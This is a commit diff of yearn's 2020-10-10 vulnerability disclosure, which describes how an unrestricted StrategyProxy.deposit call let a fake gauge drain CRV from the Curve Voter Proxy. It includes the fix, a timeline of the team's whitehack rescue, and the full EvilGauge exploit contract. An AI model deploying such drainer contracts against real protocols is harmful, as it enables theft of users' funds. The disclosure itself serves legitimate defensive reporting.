disclosures/2020-10-10.md, before:

# Vulnerability disclosure 2020-10-10

## Summary

- A vulnerability that puts token balance of Curve Voter Proxy at risk was discovered.
- The only token in its balance was $20k worth of CRV.
- The vulnerability was exploited by the team, all funds are rescued.

## Background

At 07:00 (UTC) Emiliano Bonassi shares a concern that `StrategyProxy.deposit(address gauge, address token)` can be executed by anyone. He explains that by constructing a fake gauge contract, it's possible to force `CurveYCRVVoter` to call `deposit(uint amount)` on it with a token allowance.

The concern is initially dismissed as funds should never end up in the proxy. Emiliano follows up with the info that there is in fact 34,352 CRV sitting in the Voter Proxy.

A few moments later Artem writes a proof of concept exploit contract, and confirms the vulnerability in forked mainnet.

The team decides to whitehack the contract to not put funds at risk. Artem exploits the contract and sends the recovered funds to multisig.

## Details of vulnerability

An `EvilGauge` contract which mimics Curve Gauge can be constructed. An attacker calls `StrategyProxy.deposit(EvilGauge, Token)`, which calls and then calls `CurveYCRVVoter.execute` with the following actions:
- `Token.approve(EvilGauge, Token.balanceOf(CurveYCRVVoter))` 
- `EvilGauge.deposit(Token.balanceOf(CurveYCRVVoter))`

Since `EvilGauge` has allowance from `CurveYCRVVoter`, it can `Token.transferFrom` that amount of funds for its benefit.

## Exploit contract

```
pragma solidity =0.5.17;

import "@openzeppelinV2/contracts/token/ERC20/IERC20.sol";

contract EvilGauge {

    IERC20 token;
    address owner;

    constructor(address _token) public {
        owner = msg.sender;
        token = IERC20(_token);
    }

    function deposit(uint amount) public {
        token.transferFrom(msg.sender, owner, amount);
    }
}
```

## Details of fix

`StrategyProxy.deposit(address,address)` must only be callable by approved Strategies:
```
require(strategies[msg.sender], "!strategy");
```

## Timeline of events

- **Oct 10, 2020, 11:00 UTC** Emiliano raises the concern in YFI Secret Admirers chat.
- **12:53** Emiliano reaches out to Artem with more details, Artem writes the exploit.
- **13:09** Exploit is confirmed to steal funds in forked mainnet.
- **13:15** Exploit deployed on mainnet and the contract is whitehacked. The funds are sent to yearn multisig.

## Links

- Whitehack [transaction](https://ethtx.info/mainnet/0x8302d3481d2b4eb6b5ba7d6b467e3ce8cd3450dac3c8857aac7964bd54ed507a)

Commit message:

add info about harvest design flaw

disclosures/2020-10-10.md, after:

# Vulnerability disclosure 2020-10-10

## Summary

- A vulnerability that puts token balance of Curve Voter Proxy at risk was discovered.
- The only token in its balance was $20k worth of CRV.
- The vulnerability was exploited by the team, all funds are rescued.

## Background

At 07:00 (UTC) Emiliano Bonassi shares a concern that `StrategyProxy.deposit(address gauge, address token)` can be executed by anyone. He explains that by constructing a fake gauge contract, it's possible to force `CurveYCRVVoter` to call `deposit(uint amount)` on it with a token allowance.

The concern is initially dismissed as funds should never end up in the proxy. Emiliano follows up with the info that there is in fact 34,352 CRV sitting in the Voter Proxy.

A few moments later Artem writes a proof of concept exploit contract, and confirms the vulnerability in forked mainnet.

The team decides to whitehack the contract to not put funds at risk. Artem exploits the contract and sends the recovered funds to multisig.

## Details of vulnerability

An `EvilGauge` contract which mimics Curve Gauge can be constructed. An attacker calls `StrategyProxy.deposit(EvilGauge, Token)`, which calls and then calls `CurveYCRVVoter.execute` with the following actions:
- `Token.approve(EvilGauge, Token.balanceOf(CurveYCRVVoter))` 
- `EvilGauge.deposit(Token.balanceOf(CurveYCRVVoter))`

Since `EvilGauge` has allowance from `CurveYCRVVoter`, it can `Token.transferFrom` that amount of funds for its benefit.

## Exploit contract

```
pragma solidity =0.5.17;

import "@openzeppelinV2/contracts/token/ERC20/IERC20.sol";

contract EvilGauge {

    IERC20 token;
    address owner;

    constructor(address _token) public {
        owner = msg.sender;
        token = IERC20(_token);
    }

    function deposit(uint amount) public {
        token.transferFrom(msg.sender, owner, amount);
    }
}
```

## Details of fix

`StrategyProxy.deposit(address,address)` must only be callable by approved Strategies:
```
require(strategies[msg.sender], "!strategy");
```

Each proxy strategy should call `StrategyProxy.lock()` on `harvest()` to avoid leaving residue CRV in Voter Proxy contract.

## Timeline of events

- **Oct 10, 2020, 11:00 UTC** Emiliano raises the concern in YFI Secret Admirers chat.
- **12:53** Emiliano reaches out to Artem with more details, Artem writes the exploit.
- **13:09** Exploit is confirmed to steal funds in forked mainnet.
- **13:15** Exploit deployed on mainnet and the contract is whitehacked. The funds are sent to yearn multisig.

## Links

- Whitehack [transaction](https://ethtx.info/mainnet/0x8302d3481d2b4eb6b5ba7d6b467e3ce8cd3450dac3c8857aac7964bd54ed507a)
